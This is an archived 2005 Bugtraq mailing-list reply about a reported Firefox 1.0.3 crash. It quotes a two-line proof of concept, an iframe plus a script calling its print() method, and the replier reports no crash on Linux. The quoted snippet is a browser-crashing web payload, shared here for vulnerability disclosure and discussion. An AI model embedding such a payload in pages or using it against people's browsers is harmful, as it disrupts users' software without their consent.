lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 11 May 2005 08:47:53 -0500
From: Jeremy Kelley <jeremy@...d.org>
To: orebla Orebla <info@...bla.it>
Cc: bugtraq@...urityfocus.com
Subject: Re: Firefox Crash??


Quoting orebla Orebla (info@...bla.it):
> 
> 
> I have found this script in turn for the net and it sends to me in crash Firefox:
> 
> <!--PROOF OF CONCEPT
> The vulnerability can be exploited with the following 2 lines of code:
> 
> <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
> &lt;script type="text/javascript">window.frames.pocframe.print();&lt;/script&gt;
> -->
> 
> I have WinXP SP2 e Firefox 1.0.3.
> 
> Why firefox crash???
> 
> PS: I do not have uncovered the vulnerability. Sorry for the English... 
> :-)


No crash here on 1.0.3 for linux.

jeremy

-- 
Jeremy Kelley <jeremy@...d.org>
The Christian ideal has not been tried and found wanting; it has been 
found difficult and left untried. - G.K. Chesterton


Powered by blists - more mailing lists